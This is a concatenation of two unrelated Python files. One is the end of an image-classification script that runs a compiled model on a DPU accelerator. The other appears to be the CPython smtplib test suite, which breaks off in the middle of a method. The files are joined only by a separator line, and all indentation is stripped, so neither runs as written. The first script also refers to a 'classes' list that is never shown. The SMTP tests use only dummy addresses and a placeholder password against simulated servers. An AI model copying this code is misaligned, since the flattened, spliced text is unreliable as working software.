print("Top[%d] %f %s" % (i, softmax_new[i], line.strip("\n")))
flag=flag+1
#######################################################################################################
SCRIPT_DIR = get_script_directory()
def CPUCalcArgmax(data):
'''
returns index of highest value in data
'''
return np.argmax(data)
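# Worked example (added for illustration): CPUCalcArgmax([0.1, 0.9]) returns 1,
# which indexes "dog" in the classes list defined above.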
#######################################################################################################
def runDPU(id,start,dpu:"Runner",img):
'''get tensor'''
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
input_ndim = tuple(inputTensors[0].dims)
output_ndim = tuple(outputTensors[0].dims)
batchSize = input_ndim[0]
n_of_images = len(img)
count = 0
write_index = start
while count < n_of_images:
if (count+batchSize<=n_of_images):
runSize = batchSize
else:
runSize=n_of_images-count
'''prepare batch input/output '''
outputData = []
inputData = []
inputData = [np.empty(input_ndim, dtype=np.float32, order="C")]
outputData = [np.empty(output_ndim, dtype=np.float32, order="C")]
'''init input image to input buffer '''
for j in range(runSize):
imageRun = inputData[0]
imageRun[j, ...] = img[(count + j) % n_of_images].reshape(input_ndim[1:])
'''run with batch '''
job_id = dpu.execute_async(inputData,outputData)
dpu.wait(job_id)
'''store output vectors '''
for j in range(runSize):
out_q[write_index] = CPUCalcArgmax(outputData[0][j])
write_index += 1
count = count + runSize
def get_child_subgraph_dpu(graph: "Graph") -> List["Subgraph"]:
assert graph is not None, "'graph' should not be None."
root_subgraph = graph.get_root_subgraph()
assert (
root_subgraph is not None
), "Failed to get root subgraph of input Graph object."
if root_subgraph.is_leaf:
return []
child_subgraphs = root_subgraph.toposort_child_subgraph()
assert child_subgraphs is not None and len(child_subgraphs) > 0
return [
cs
for cs in child_subgraphs
if cs.has_attr("device") and cs.get_attr("device").upper() == "DPU"
]
def app(image_dir, threads, model, use_post_proc):
'''
main application function
'''
listimage=os.listdir(image_dir)
#print(listimage)
runTotal = len(listimage)
print('Found',len(listimage),'images - processing',runTotal,'of them')
''' global list that all threads can write results to '''
global out_q
out_q = [None] * runTotal
all_dpu_runners = []
''' get a list of subgraphs from the compiled model file '''
g = xir.Graph.deserialize(model) #(pathlib.Path(model))
subgraphs = get_child_subgraph_dpu(g)
assert len(subgraphs) == 1 # only one DPU kernel
print('Found',len(subgraphs),'subgraphs in',model)
for i in range(threads):
# make a runner for each thread, give it a subgraph to execute
all_dpu_runners.append(vart.Runner.create_runner(subgraphs[0], "run"))
''' preprocess images '''
img = []
for i in range(runTotal):
path = os.path.join(image_dir,listimage[i])
img.append(preprocess_fn(path))
''' create threads
Each thread receives a section of the preprocessed images list as input and
will write results into the corresponding section of the global out_q list.
'''
threadAll = []
start=0
for i in range(threads):
# divide the list of preprocessed images across the threads
if (i==threads-1):
end = len(img)
else:
end = start+(len(img)//threads)
in_q = img[start:end]
t1 = threading.Thread(target=runDPU, args=(i,start,all_dpu_runners[i], in_q))
threadAll.append(t1)
start=end
time1 = time.time()
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time2 = time.time()
timetotal = time2 - time1
fps = float(runTotal / timetotal)
print(" ")
print("FPS=%.2f, total frames = %.0f , time=%.4f seconds" %(fps,runTotal, timetotal))
print(" ")
del all_dpu_runners
''' post-processing '''
if (use_post_proc == 1):
correct = 0
wrong = 0
for i in range(len(out_q)):
#print("image number ", i)
#inp_img = (in_q[i] + 0.5) * 255.0
#cv2.imshow("Image", np.uint8(inp_img));
#cv2.waitKey(10);
prediction = classes[out_q[i]]
#print(listimage[i])
ground_truth = listimage[i].split(".")[0]
if (ground_truth==prediction):
correct += 1
else:
wrong += 1
accuracy = correct/len(out_q)
print('Correct:', correct,'Wrong:', wrong,'Accuracy:', accuracy)
#######################################################################################################
# only used if script is run as 'main' from command line
def main():
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--images', type=str, default="./test_images/", help='Path to folder of test images')
ap.add_argument('-t', '--threads', type=int, default=1, help='Number of threads. Default is 1')
ap.add_argument('-m', '--model', type=str, help='Path of elf file')
ap.add_argument('-p', '--postpr', type=int, default=0, help='use postProcessing: YES (1), NO (0). Default is NO')
args = ap.parse_args()
print('Command line options:')
print(' --images : ', args.images)
print(' --threads : ', args.threads)
print(' --model : ', args.model)
print(' --postpr : ', args.postpr)
app(args.images,args.threads,args.model, args.postpr)
#######################################################################################################
if __name__ == '__main__':
main()
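# --- Example invocation (added for illustration) ---
# Based on the argparse options above; the image folder and compiled model file
# are placeholders, not files shipped with this script:
#   python3 classification.py --images ./test_images/ --threads 2 --model <compiled-model-file> --postpr 1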
|
test_smtplib.py
|
import asyncore
import email.mime.text
import email.utils
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import base64
import unittest
from test import support, mock_socket
try:
import threading
except ImportError:
threading = None
HOST = support.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
port = support.find_unused_port()
try:
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3, source_address=('127.0.0.1', port))
self.assertEqual(smtp.source_address, ('127.0.0.1', port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
threading.Thread(target=server, args=servargs).start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_auth_credentials = {
'login': 'TXIuQUBzb21ld2hlcmUuY29t',
'plain': 'AE1yLkFAc29tZXdoZXJlLmNvbQBzb21lcGFzc3dvcmQ=',
'cram-md5': ('TXIUQUBZB21LD2HLCMUUY29TIDG4OWQ0MJ'
'KWZGQ4ODNMNDA4NTGXMDRLZWMYZJDMODG1'),
}
sim_auth_login_user = 'TXIUQUBZB21LD2HLCMUUY29T'
sim_auth_plain = 'AE1YLKFAC29TZXDOZXJLLMNVBQBZB21LCGFZC3DVCMQ='
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_AUTH(self, arg):
mech = arg.strip().lower()
if mech=='cram-md5':
self.push('334 {}'.format(sim_cram_md5_challenge))
elif mech not in sim_auth_credentials:
self.push('504 auth type unimplemented')
return
elif mech=='plain':
self.push('334 ')
elif mech=='login':
self.push('334 ')
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for email, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(email)),
"ascii"))
self.assertEqual(smtp.vrfy(email), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
# SimSMTPChannel doesn't fully support AUTH because it requires a
# synchronous read to obtain the credentials...so instead smtpd
# sees the credential sent by smtplib's login method as an unknown command,
# which results in smtplib raising an auth error. Fortunately the error
# message contains the encoded credential, so we can partially check that it
# was generated correctly (partially, because the 'word' is uppercased in
# the error message).
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_plain, str(err))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_login_user, str(err))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_credentials['cram-md5'], str(err))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
